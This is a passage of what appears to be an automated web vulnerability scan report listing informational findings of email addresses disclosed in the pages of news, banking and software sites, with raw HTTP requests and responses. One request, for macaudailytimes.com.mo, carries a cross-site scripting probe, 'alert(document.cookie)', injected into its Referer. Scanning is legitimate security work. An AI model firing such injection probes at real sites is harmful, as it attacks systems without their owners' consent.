...[SNIP]...

19.102. http://www.heraldsun.com.au/ipad/blue-sky-thinking-at-farm/story-fn6bn4mv-1225993868919  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heraldsun.com.au
Path:   /ipad/blue-sky-thinking-at-farm/story-fn6bn4mv-1225993868919

Issue detail

The following email address was disclosed in the response:

Request

GET /ipad/blue-sky-thinking-at-farm/story-fn6bn4mv-1225993868919 HTTP/1.1
Host: www.heraldsun.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 69774
Content-Type: text/html;charset=UTF-8
X-Cache-Lookup: MISS from news.com.au:80
Cache-Control: max-age=263
Expires: Thu, 03 Feb 2011 01:20:17 GMT
Date: Thu, 03 Feb 2011 01:15:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-au" lang="en-au">
<hea
...[SNIP]...
<a href="mailto:news@heraldsun.com.au?subject=pic%20from%20website%20reader&amp;body=Dear%20reader:%0APlease%20attach%20your%20pictures,%20then%20delete%20this%20text%20and%20replace%20it%20with%20as%20much%20information%20as%20you%20can%
...[SNIP]...

19.103. http://www.invisionpower.com/company/contact.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /company/contact.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /company/contact.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=cce78ef272198dcc830c2cd1d7562812; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:38 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17404

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<a href='mailto:sales@invisionpower.com' title='Email Sales'>sales@invisionpower.com</a>
...[SNIP]...
<a href='mailto:accounts@invisionpower.com' title='Email Accounts Dept.'>accounts@invisionpower.com</a>
...[SNIP]...
<a href='mailto:billing@invisionpower.com' title='Email Billing Dept.'>billing@invisionpower.com</a>
...[SNIP]...

19.104. http://www.invisionpower.com/legal/privacy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /legal/privacy.php

Issue detail

The following email address was disclosed in the response:

Request

GET /legal/privacy.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=b29a6b78fc93b0263db0ec46b596aa2c; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:42 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16942

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<a href='mailto:business@invisionpower.com'>business@invisionpower.com</a>
...[SNIP]...

19.105. http://www.invisionpower.com/suite/demo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /suite/demo.php

Issue detail

The following email address was disclosed in the response:

Request

GET /suite/demo.php HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=b3ba07c46c7f59c4c2530598f305678d; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:27 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14937

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<a href='mailto:sales@invisionpower.com'>
...[SNIP]...

19.106. http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.journalpioneer.com
Path:   /News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1

Issue detail

The following email addresses were disclosed in the response:

Request

GET /News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1 HTTP/1.1
Host: www.journalpioneer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:42 GMT
Set-Cookie: PHPSESSID=b01a1100153421468e753ab4f672b414; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, public
Pragma: no-cache
Keep-Alive: timeout=15, max=9982
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_M4_qse_vojt=ffffffffc3a09c6445525d5f4f58455e445a4a423660;path=/;httponly
Content-Length: 60632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head>

<title>Premi
...[SNIP]...
<meta name="Reply-to" content="newsroom@journalpioneer.com" />
...[SNIP]...
<span class="email">no-reply@transcontinentalmedia.com</span>
...[SNIP]...
<a href="mailto:newsroom@journalpioneer.com " title="Submit your Letter to the Editor">
...[SNIP]...
<a href="mailto:newsroom@journalpioneer.com " title="Submit your Letter to the Editor">
...[SNIP]...

19.107. http://www.jpmorgan.com/script/jquery.pngFix.pack.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /script/jquery.pngFix.pack.js

Issue detail

The following email address was disclosed in the response:

Request

GET /script/jquery.pngFix.pack.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACE_COOKIE=R2666079405; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:42 GMT
Server: Apache
Last-Modified: Fri, 08 Oct 2010 22:55:29 GMT
ETag: "2bc00-9bf-e8325a40"
Accept-Ranges: bytes
Content-Length: 2495
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.1, 11.09.2007
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*/
eval(function(p
...[SNIP]...

19.108. http://www.jpmorgan.com/script/lightbox_support/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /script/lightbox_support/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /script/lightbox_support/controls.js HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/pages/jpmorgan
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT
Date: Wed, 02 Feb 2011 22:29:46 GMT
Server: Apache
Last-Modified: Thu, 15 Jul 2010 19:52:56 GMT
ETag: "8e703-87e3-72d5f600"
Accept-Ranges: bytes
Content-Length: 34787
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

// script.aculo.us controls.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009

// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2009 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

19.109. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpost.com
Path:   /ArtsAndCulture/FoodAndWine/Article.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /ArtsAndCulture/FoodAndWine/Article.aspx?id=203979 HTTP/1.1
Host: www.jpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lnetycrs52hjwi45jufkaq55; path=/; HttpOnly
Content-Type: text/html; charset=utf-8
Content-Length: 108706
Accept-Ranges: bytes
Cache-Control: private, max-age=420
Age: 0
Expires: Thu, 03 Feb 2011 01:23:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="ctl00_He
...[SNIP]...
<a href='mailto:jpostcolumns@gmail.com'>
...[SNIP]...

19.110. http://www.lokeshdhakar.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lokeshdhakar.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.lokeshdhakar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:01 GMT
Server: Apache
X-Pingback: http://www.lokeshdhakar.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 37290
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>

<meta charset="utf-8" />

<title> Lokesh Dhakar</title>

<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="style
...[SNIP]...
<a href="mailto:lokesh.dhakar@gmail.com">
...[SNIP]...

19.111. http://www.macaudailytimes.com.mo/compress.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macaudailytimes.com.mo
Path:   /compress.php

Issue detail

The following email address was disclosed in the response:

Request

GET /compress.php?js,js/framework/prototype,js/control_tabs,js/functions,plugins/fbconnect/js/fbconnect,js/tooltips,js/framework/builder,js/framework/effects,js/bookmark HTTP/1.1
Host: www.macaudailytimes.com.mo
Proxy-Connection: keep-alive
Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VivvoSessionId=3a9063f24d4a054f92c63

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:31:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Expires: Sun, 13 Feb 2011 01:31:03 GMT
Last-Modified: Sat, 29 Jan 2011 12:47:53 GMT
Cache-Control: public, max-age=864000
Pragma: !invalid
ETag: "8b38f8bac6139feae5a0c2c5a224cf91"
Vary: Accept-Encoding
Content-Type: application/x-javascript
Content-Length: 188227

/* Prototype JavaScript framework, version 1.6.0.3
* (c) 2005-2008 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototyp
...[SNIP]...
<ryan@livepipe.net>
...[SNIP]...

19.112. https://www.navyfederal.org/account-management/how-do-i.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /account-management/how-do-i.php

Issue detail

The following email address was disclosed in the response:

Request

GET /account-management/how-do-i.php HTTP/1.1
Host: www.navyfederal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:19:53 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 54928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:phishalert@navyfederal.org" onclick="javascript:$(document).trigger('close.facebox')">phishalert@navyfederal.org</a>
...[SNIP]...

19.113. https://www.navyfederal.org/js/facebox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /js/facebox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/facebox.js HTTP/1.1
Host: www.navyfederal.org
Connection: keep-alive
Referer: https://www.navyfederal.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:41 GMT
Server: Apache
Last-Modified: Mon, 20 Sep 2010 17:29:40 GMT
ETag: "25df-41d78900"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:00:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 9695

/*
* Facebox (for jQuery)
* version: 1.2 (05/05/2008)
* @requires jQuery v1.2 or later
*
* Examples at http://famspam.com/facebox/
*
* Licensed under the MIT:
* http://www.opensource.org/licenses/mit-license.php
*
* Copyright 2007, 2008 Chris Wanstrath [ chris@ozmm.org ]
*
* Usage:
*
* jQuery(document).ready(function() {
* jQuery('a[rel*=facebox]').facebox()
* })
*
* <a href="#terms" rel="facebox">
...[SNIP]...

19.114. https://www.navyfederal.org/js/jquery.pngFix.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.navyfederal.org
Path:   /js/jquery.pngFix.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/jquery.pngFix.js HTTP/1.1
Host: www.navyfederal.org
Connection: keep-alive
Referer: https://www.navyfederal.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:42 GMT
Server: Apache
Last-Modified: Sun, 12 Sep 2010 12:19:17 GMT
ETag: "123b-fd181b40"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Thu, 03 Feb 2011 04:00:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript
Content-Length: 4667

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.2, 09.03.2009
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*
* Changelog:
* 09
...[SNIP]...
d @ from selectors
* 11.09.2007 Version 1.1
* - removed noConflict
* - added png-support for input type=image
* - 01.08.2007 CSS background-image support extension added by Scott Jehl, scott@filamentgroup.com, http://www.filamentgroup.com
* 31.05.2007 initial Version 1.0
* --------------------------------------------------------------------
* @example $(function(){$(document).pngFix();});
* @desc Fi
...[SNIP]...

19.115. http://www.news.com.au/business/breaking-news/clean-seas-tuna-ltd-says-it-expects-to-post-a-net-loss/story-e6frfkur-1225993482916  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.news.com.au
Path:   /business/breaking-news/clean-seas-tuna-ltd-says-it-expects-to-post-a-net-loss/story-e6frfkur-1225993482916

Issue detail

The following email address was disclosed in the response:

Request

GET /business/breaking-news/clean-seas-tuna-ltd-says-it-expects-to-post-a-net-loss/story-e6frfkur-1225993482916 HTTP/1.1
Host: www.news.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 84114
Content-Type: text/html;charset=UTF-8
X-Cache-Lookup: MISS from news.com.au:80
Cache-Control: max-age=300
Expires: Thu, 03 Feb 2011 01:22:21 GMT
Date: Thu, 03 Feb 2011 01:17:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-au" lang="en-au">
<hea
...[SNIP]...
<a href="mailto:business@news.com.au?subject=Business%20Site%20Feedback">business@news.com.au</a>
...[SNIP]...

19.116. http://www.nickstakenburg.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nickstakenburg.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.nickstakenburg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 8741
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Date: Thu, 03 Feb 2011 01:17:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Nick Stakenburg : Web Developer and Illustrator</title
...[SNIP]...
<meta name="author" content="Nick Stakenburg - nick@nickstakenburg.com"/>
...[SNIP]...
<a href='mailto:nick@nickstakenburg.com'>nick@nickstakenburg.com</a>
...[SNIP]...

19.117. http://www.nickstakenburg.com/projects/lightview/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nickstakenburg.com
Path:   /projects/lightview/

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/lightview/ HTTP/1.1
Host: www.nickstakenburg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 46971
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Date: Thu, 03 Feb 2011 01:17:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lightview</title>
...[SNIP]...
<meta name="author" content="Nick Stakenburg - nick@nickstakenburg.com"/>
...[SNIP]...
<a href='mailto:nick@nickstakenburg.com'>nick@nickstakenburg.com</a>
...[SNIP]...

19.118. http://www.opensource.org/licenses/gpl-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:53 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=3gpidtp18sji9mbnc5ikeu67s3; expires=Sat, 26-Feb-2011 01:34:13 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 02 Feb 2011 21:49:54 GMT
ETag: "6ad65b857b676f9bc4304e9a1542a297"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

19.119. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:52 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=42d1eq3k1jalsbr539va4riur5; expires=Sat, 26-Feb-2011 01:34:12 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 02 Feb 2011 21:46:24 GMT
ETag: "c8a6b2f76573aab17765d5878645eca9"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

19.120. http://www.perishablenews.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perishablenews.com
Path:   /index.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /index.php?article=0012418 HTTP/1.1
Host: www.perishablenews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40607

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Tuna Fight Muddies Wat
...[SNIP]...
<a class="tools" href="mailto:editor@PerishableNews.com?subject=Tuna Fight Muddies Waters Over Damage From BP Spill">
...[SNIP]...
<a class="pr" href="mailto:SeafoodPR@PerishableNews.com">SeafoodPR@PerishableNews.com</a>
...[SNIP]...

19.121. http://www.perishablenews.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perishablenews.com
Path:   /index.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /index.php HTTP/1.1
Host: www.perishablenews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33487

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>PerishableNews - Peris
...[SNIP]...
<META NAME="Author" CONTENT="jkahan@phoenixmedianet.com"/>
<META NAME="Author" CONTENT="tlevine@phoenixmedianet.com"/>
<META NAME="Author" CONTENT="jprevor@phoenixmedianet.com"/>
...[SNIP]...

19.122. https://www.pnc.com/webapp/sec/Forms.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/sec/Forms.do

Issue detail

The following email addresses were disclosed in the response:

Request

GET /webapp/sec/Forms.do?siteArea=/pnccorp/PNC/Contact+Us HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
